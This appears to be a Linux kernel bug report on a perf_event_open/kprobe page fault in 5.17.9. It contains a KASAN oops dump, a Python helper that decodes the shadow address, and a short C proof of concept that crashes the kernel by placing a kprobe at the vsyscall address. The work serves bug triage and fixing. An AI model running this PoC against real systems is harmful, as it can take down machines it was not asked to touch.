
Linux Kernel: perf_event_open bad address access

Crash Report

BUG: unable to handle page fault for address: fffffbfff3d06000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 123fee067 P4D 123fee067 PUD 123fb2067 PMD 123f30067 PTE 0
Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI
CPU: 0 PID: 20950 Comm: syz-executor.0 Not tainted 5.17.9 #5
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:insn_get_prefixes.part.0+0xa8/0x1180
Code: 49 be 00 00 00 00 00 fc ff df 48 8b 40 60 48 89 44 24 08 e9 81 00 00 00 e8 45 7d 44 ff 4c 89 fa 4c 89 f9 48 c1 ea 03 83 e1 07 <42> 0f b6 14 32 38 ca 7f 08 84 d2 0f 85 ad 0f 00 00 48 89 d8 48 89
RSP: 0018:ffff88810558f910 EFLAGS: 00010246
RAX: 0000000000040000 RBX: ffffffff9cda27a0 RCX: 0000000000000000
RDX: 1ffffffff3d06000 RSI: ffffc90000281000 RDI: ffff88810558fa98
RBP: ffffffff9e830001 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000001
R13: ffffffff9e830000 R14: dffffc0000000000 R15: ffffffff9e830000
FS:  00007f6011223700(0000) GS:ffff88811b200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: fffffbfff3d06000 CR3: 0000000103fca005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000020000080 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 55555554
Call Trace:
  <TASK>
 insn_get_modrm+0x646/0x7c0
 insn_get_sib+0x296/0x330
 insn_get_displacement+0x346/0x6c0
 insn_decode+0x597/0x650
 can_probe+0xfc/0x1c0
 arch_prepare_kprobe+0x79/0x1c0
 register_kprobe+0x9f1/0x1540
 __register_trace_kprobe+0x262/0x2d0
 create_local_trace_kprobe+0x1e6/0x3b0
 perf_kprobe_init+0x18c/0x280
 perf_kprobe_event_init+0xf8/0x1c0
 perf_try_init_event+0x12d/0x570
 perf_event_alloc.part.0+0xf54/0x2da0
 __do_sys_perf_event_open+0x4a7/0x2bc0
 do_syscall_64+0x38/0x90
 entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f60120ad119
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f6011223168 EFLAGS: 00000246 ORIG_RAX: 000000000000012a
RAX: ffffffffffffffda RBX: 00007f60121bff60 RCX: 00007f60120ad119
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000020000080
RBP: 00007f601210708d R08: 0000000000000000 R09: 0000000000000000
R10: ffffffffffffffff R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffff4d24c5f R14: 00007f6011223300 R15: 0000000000022000
 </TASK>
Modules linked in:
CR2: fffffbfff3d06000
---[ end trace 0000000000000000 ]---
RIP: 0010:insn_get_prefixes.part.0+0xa8/0x1180
Code: 49 be 00 00 00 00 00 fc ff df 48 8b 40 60 48 89 44 24 08 e9 81 00 00 00 e8 45 7d 44 ff 4c 89 fa 4c 89 f9 48 c1 ea 03 83 e1 07 <42> 0f b6 14 32 38 ca 7f 08 84 d2 0f 85 ad 0f 00 00 48 89 d8 48 89
RSP: 0018:ffff88810558f910 EFLAGS: 00010246
RAX: 0000000000040000 RBX: ffffffff9cda27a0 RCX: 0000000000000000
RDX: 1ffffffff3d06000 RSI: ffffc90000281000 RDI: ffff88810558fa98
RBP: ffffffff9e830001 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000001
R13: ffffffff9e830000 R14: dffffc0000000000 R15: ffffffff9e830000
FS:  00007f6011223700(0000) GS:ffff88811b200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: fffffbfff3d06000 CR3: 0000000103fca005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000020000080 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 55555554
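Two things in this dump can be decoded before any source analysis: CR2 (fffffbfff3d06000) lies in the x86_64 KASAN shadow region, and the code bytes at RIP (48 c1 ea 03 = shr rdx,3; 42 0f b6 14 32 = movzx edx, byte [rdx+r14] with R14 = dffffc0000000000) are the inline KASAN check, so the address insn_get_prefixes was really trying to read is (CR2 - KASAN_SHADOW_OFFSET) << 3 = ffffffff9e830000, the value sitting in R13/R15. The Python helper below is an added triage example, not part of the original post; it assumes generic KASAN with 4-level paging and the standard shadow offset 0xdffffc0000000000, and works on a constructed excerpt of the oops above.

```python
import re

# Constructed excerpt of the oops quoted above; only the lines the helper reads.
OOPS = """\
BUG: unable to handle page fault for address: fffffbfff3d06000
RDX: 1ffffffff3d06000 RSI: ffffc90000281000 RDI: ffff88810558fa98
R13: ffffffff9e830000 R14: dffffc0000000000 R15: ffffffff9e830000
Call Trace:
 insn_get_modrm+0x646/0x7c0
 insn_decode+0x597/0x650
 can_probe+0xfc/0x1c0
 perf_kprobe_init+0x18c/0x280
 __do_sys_perf_event_open+0x4a7/0x2bc0
"""

# x86_64 generic KASAN, 4-level paging (assumed from the folded PGD/P4D line):
# the shadow byte covering `addr` lives at (addr >> 3) + KASAN_SHADOW_OFFSET.
KASAN_SHADOW_OFFSET = 0xDFFFFC0000000000
KASAN_SHADOW_START = KASAN_SHADOW_OFFSET + (0xFFFF800000000000 >> 3)  # 0xffffec0000000000
KASAN_SHADOW_END = KASAN_SHADOW_OFFSET + (1 << 61)  # 0xfffffc0000000000

FRAME_RE = re.compile(r"^ ([A-Za-z_.$][\w.$]*)\+0x[0-9a-f]+/0x[0-9a-f]+$")
REG_RE = re.compile(r"\b(R[A-Z0-9]{2}): ([0-9a-f]{16})\b")

def kasan_shadow_to_addr(shadow):
    """Kernel address whose shadow byte sits at `shadow`, or None if `shadow`
    is outside the KASAN shadow region (i.e. an ordinary bad pointer)."""
    if not KASAN_SHADOW_START <= shadow < KASAN_SHADOW_END:
        return None
    return (shadow - KASAN_SHADOW_OFFSET) << 3

def triage(oops):
    """Extract fault address, registers and call trace; when the fault landed
    in KASAN shadow, recover the address the instrumented load was checking."""
    fault = int(re.search(r"fault for address: ([0-9a-f]{16})", oops).group(1), 16)
    regs = {name: int(val, 16) for name, val in REG_RE.findall(oops)}
    trace = [m.group(1) for m in map(FRAME_RE.match, oops.splitlines()) if m]
    orig = kasan_shadow_to_addr(fault)
    return {
        "fault_addr": fault,
        "in_kasan_shadow": orig is not None,
        "orig_addr": orig,
        # registers still holding that address identify the pointer being walked
        "regs_holding_orig": sorted(n for n, v in regs.items() if v == orig),
        "trace": trace,
    }

if __name__ == "__main__":
    print(triage(OOPS))
```

A fault whose original address is in the kernel image range but has no shadow page, as here, means the code walked a kernel pointer into unmapped text, not a heap or stack corruption; the same helper returns `orig_addr = None` for an ordinary bad pointer.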

Function call chain

Work in progress

Vulnerability analysis

Work in progress

PoC

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>

int main(void)
{
    /* zero the whole struct so only the fields set below are non-zero */
    struct perf_event_attr *attr = calloc(1, sizeof(*attr));
    if (!attr)
        return 1;

    /* 0x6 is the dynamic PMU id of the kprobe PMU on the crashing kernel
     * (see perf_kprobe_event_init in the trace); on a given kernel it can be
     * read from /sys/bus/event_source/devices/kprobe/type */
    attr->type = 0x6;
    attr->size = 0x80;
    attr->__reserved_1 = 0x4;
    /* 0xffffffffff600000 is the legacy x86_64 vsyscall page */
    attr->kprobe_addr = 0xffffffffff600000;

    /* perf_event_open(attr, pid = 0, cpu = 0, group_fd = -1, flags = 0) */
    long ret = syscall(__NR_perf_event_open, attr, 0, 0, -1, 0);
    printf("perf_event_open returned %ld\n", ret);
    if (ret < 0)
        perror("perf_event_open");

    free(attr);
    return 0;
}